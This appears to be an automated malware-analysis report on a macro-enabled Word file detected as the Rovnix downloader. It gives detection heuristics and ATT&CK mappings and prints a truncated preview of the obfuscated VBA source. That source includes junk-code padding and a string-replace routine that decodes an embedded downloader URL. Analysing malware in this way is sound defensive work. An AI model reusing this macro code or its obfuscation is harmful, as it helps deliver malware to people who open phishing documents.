MALICIOUS
262
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1566.001 Spearphishing Attachment
The file is an OOXML document containing VBA macros, specifically an Auto_Close macro that uses CreateObject to execute code. ClamAV signatures identify this as Doc.Downloader.Rovnix-6497736-0. The VBA script attempts to run other macros, indicating a downloader functionality. The presence of VBA macros and the downloader behavior strongly suggest a malicious document, likely delivered via spearphishing.
Heuristics 6
-
ClamAV: Doc.Downloader.Rovnix-6497736-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Downloader.Rovnix-6497736-0
-
VBA project inside OOXML medium 3 related findings OOXML_VBADocument contains a VBA project — VBA macros present
-
Auto_Close macro high OLE_VBA_AUTOCLOSEAuto_Close macro
-
CreateObject call high OLE_VBA_CREATEOBJCreateObject call
-
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas In document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2014/chartexIn document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/markup-compatibility/2006In document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/officeDocument/2006/relationshipsIn document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/officeDocument/2006/mathIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2010/wordprocessingDrawingIn document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawingIn document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/wordprocessingml/2006/mainIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2010/wordmlIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2012/wordmlIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2015/wordml/symexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2010/wordprocessingGroupIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2010/wordprocessingInkIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2006/wordmlIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2010/wordprocessingShapeIn document text (OOXML body / shared strings)
Extracted artifacts 2
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source from OOXML) | 16008 bytes |
SHA-256: c027436ca5f10f8b3b501a437bcf7e692c56f57f8629b71025bc98a349aa1501 |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub EQoAYkZxUYqcJL()
IRPVRTKNLJEI = Acos(241) - 2805 - Acos(4423)
PxJOJYA = 2919 + Acos(3721) + Acos(4748) + Acos(1943)
ZPUfNCvR = Acos(493) + Acos(3449) + 4227 + Acos(1348)
Application.Run "fKdqfXDnviSzzV"
nIYpSJEuPYp = 4722 - 4068 - 2754 - 2643 - 3401 - 1988 - 745
cpUkXTBzHHr = 4390 + Acos(3713) + Acos(1951) + Acos(4503) + Acos(896) + Acos(3347)
WEbcMbbn = Acos(1888) - 2499 - 86 - Acos(1123)
End Sub
Sub TLNGBRGDjzHRCk()
QAjqgqwrZ = 73 + 4815 + 602
DnviSzzVwABE = Acos(2590) + 1050 + 800 + 4385 + 200 + Acos(421) + 1277
LNGBRGDjzHRC = "ivLZWjAgjH" + "iOQ" + Left("buvSZyMBpQ", 3)
Application.Run "ocqyDfPWIjcbqIDML"
rTNwOEIp = Acos(3077) - 458 - 4891 - Acos(1029) - Acos(4066)
wyOZdcKZEdX = "MSEPDgLBJfrP" + Left("KnNEKKxWHK", 7) + Left("jvjpIvWibu", 10)
OLRzvPjE = "JCrViWxvVi" + Left("JycAHGdRBc", 7) + Left("IUMvKgUqbu", 9) + "LOCgboQiVKQcXOQ"
XyRJXRAjdERv = RTrim("ABoYWLGgOHxTBWW") + "gIEopdFikZTvqUFdvNoZNYXyvGw" + "D" + LTrim("Z")
SfSTJuDN = Acos(2712) - Acos(774) - Acos(1509)
End Sub
Function Acos(X)
Acos = Atn(X) - Atn(1)
End Function
Public Function MOkkOTMwCZFPf(jyCwpdBPxJjvOWEIiv, MLJNokpZoRXQv, gJJTGCNoMQMHuE)
oPibRCdnSZg = Left("upZNOxXunG", 1) + "qExgfTdIBrI" + Left("VpUquKRiHg", 3) + Left("qCJLxzNkkw", 2) + Left("kUEinydprK", 2) + "SuB"
CNiXrGyZW = Left("EkRGgcWvZd", 1) + "cG"
NOBMRvP = Acos(3899) - Acos(2392) - 385 - 3748 - 1851
vTQrxYvB = 1690 - 2091 - 1161 - 2414 - Acos(4235) - 2031 - 2100
MOkkOTMwCZFPf = Replace(jyCwpdBPxJjvOWEIiv, MLJNokpZoRXQv, gJJTGCNoMQMHuE)
VXAXwMZHyrdE = Left("xNnYpSAWTP", 6) + "HiJbYdO" + "BpfGbbrSgkMNY" + Left("SuFFrwYAJR", 2)
TKNuWOgziF = Acos(2774) + 663 + Acos(2010) + Acos(4594)
fSqNPPE = Acos(2989) + Acos(1664) + 815 + 4151
LUOdLgF = RTrim("APPWodGNBoxcjSVjNdzYnzGQ") + "CgDrxZWPvIUQLCBHqDq" + "yScEzpz" + RTrim("ygKwyAJgVfVZ")
TIbOdHOOO = "OrRMGfWMLwypc" + LTrim("fJTU") + "Qnwv" + "QABoxJA"
uQfBYOCMMj = "FUKyEPMDFbbCzGkfDUrDKYWCnqnoY" + RTrim("TDvgIoLLBX") + LTrim("YZQuUWNIf")
LSEYgGM = "IJxNCvoYccy" + "TRCxigwnjW" + "yWUQdGW" + "zFYMKvVgEkzUwF" + "ziTNqbbDcTyHoPp" + "pKjMJRw"
ATzMSiKcSU = 4898 + Acos(112)
CVQqYQzA = 4972 - 3112 - Acos(3502) - Acos(1834) - Acos(663) - Acos(153)
TxCYjHnYXCBQ = Left("cBgECYAWji", 6) + "iRDkzCJP"
bPGEkVNvXJX = "nPOiWKrjCoqdcq" + "jczGMp" + Left("qQVrMJiMxr", 3) + "ZNkruqDdUrz"
wguKgfTBvpPW = Acos(4018) - Acos(4688) - Acos(2366)
LirpvUIkdDyj = "MwL" + Left("FYfORkVWvg", 5) + "fFD"
dcUnrrSujTD = Left("KpFukBzxyE", 2) + "RRzcR" + Left("KgQDDnJLyb", 1)
QcFSAvXp = "vfVUyYgKdKPNbCAkCubHkBbdv" + "JKGiwUH" + RTrim("duuAQCLLKXQJqxbNKbiXCGFPQqd")
GBvJfZAMwd = Acos(1397) + Acos(1435) + 1649 + 4193 + Acos(1761) + Acos(4263)
End Function
Sub ocqyDfPWIjcbqIDML()
fZixyWCfu = 2973 + Acos(556) + 4681 + Acos(654) + Acos(2099) + Acos(1844) + Acos(4545)
ZzDOIfQ = Acos(2544) + Acos(4383) + 1743 + Acos(4185) + Acos(4222)
jznDyAvjJMQ = Acos(233) + 4494
zvqQzSzbI = 4428 - 4441 - 749 - Acos(4720) - Acos(868) - 4644 - 4413
wOEpEyErP = "SbbfiCBrMXLqXUPqLqwZpECKCKQbOj" + "XOgoEgPITZZyyDYziqAcDvHdDun" + "zuOTZLAij" + "HoPJGETFPnwEzbonpxWHA"
kJHJDVnxAdoTCp = "bBQPRdwEDxbFyxuxYgTKgQgQhpSKNVpYIibEjSrSIMzgBjKoO hpSKNVpYIibEjpSKNVpYIibEjp://qdkngijbqnwMJWuDNVEWUCihiqwrbzudwMJWuDNVEWUCi.cobBQPRdwEDxbF/REX/yxuxYgTKgQgQVqLjZkURCkFKick.php?upSKNVpYIibEjbBQPRdwEDxbFSrSIMzgBjKoO=bobBQPRdwEDxbFbj"
kJHJDVnxAdoTCp = MOkkOTMwCZFPf(kJHJDVnxAdoTCp, "bBQPRdwEDxbF", "m")
kWwVMog = "IrZyyVLnIGFdjo" + "vNzZUOSCwv" + LTrim("pU")
DuCSTJDgnEoX = 88 - 1694 - Acos(1118) - Acos(3945) - Acos(3288) - 61
wkRCxEQi = 1103 - 4180 - 3081 - Acos(1857) - 1111 - Acos(2491)
uoUURCP = 4888 - Acos(4117) - Acos(1591) - 2301
yccURGEwbd = "uYdOWvI" + Left("nIKVUDWopr", 4)
SOPOvvESF = RTrim("MqWC") + LTrim("PjRgTwPSYnuILzR") + "iNPqHD" + RTrim("ULRvYXQ") + "
... (truncated)
|
|||
vbaProject_00.bin |
vba-project | OOXML VBA project: word/vbaProject.bin | 43520 bytes |
SHA-256: 0e9920b6a85fe7c5c256ac6449d579321d5993dfb0abd2ebb7498895ac5b331b |
|||
|
Detection
ClamAV:
Doc.Downloader.Rovnix-6497736-0
Obfuscation or payload:
unlikely
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.